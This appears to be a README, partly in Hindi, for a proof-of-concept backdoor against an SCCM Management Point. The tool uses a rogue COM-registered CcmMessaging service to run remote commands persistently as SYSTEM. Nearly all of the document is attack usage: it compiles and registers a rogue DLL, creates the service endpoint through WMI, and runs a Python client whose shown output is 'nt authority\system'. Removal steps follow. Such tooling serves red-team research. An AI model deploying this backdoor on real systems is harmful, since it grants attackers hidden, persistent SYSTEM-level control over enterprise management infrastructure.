
SCCM प्रबंधन बिंदु के लिए प्रूफ-ऑफ-कॉन्सेप्ट बैकडोर जो SYSTEM के रूप में स्थायी दूरस्थ कमांड निष्पादन के लिए दुष्ट COM सेवा का उपयोग करता है।
प्रबंधन बिंदु (Management Point) पर पहुँच बनाए रखने के लिए एक दुष्ट CcmMessaging सेवा बनाने तथा स्थापित करने हेतु Proof of Concept टूलिंग।
# Compile
PS C:\> C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe /t:library /out:c:\rogue.dll RogueCcmEndpoint.cs
# Register CLSID
PS C:\> C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegAsm.exe /codebase c:\rogue.dll
PS C:\> ./wmi_create_rogue_service_endpoint.ps1
$ python3 ccmmessaging_backdoor_client.py -t https://mp.corp.local -s MP_Backdoor 'whoami'
[...]
<BackdoorResponse>nt authority\system
</BackdoorResponse>
# Unregister CLSID
PS C:\> C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegAsm.exe /unregister c:\rogue.dll
PS C:\> ./wmi_remove_rogue_service_endpoint.ps1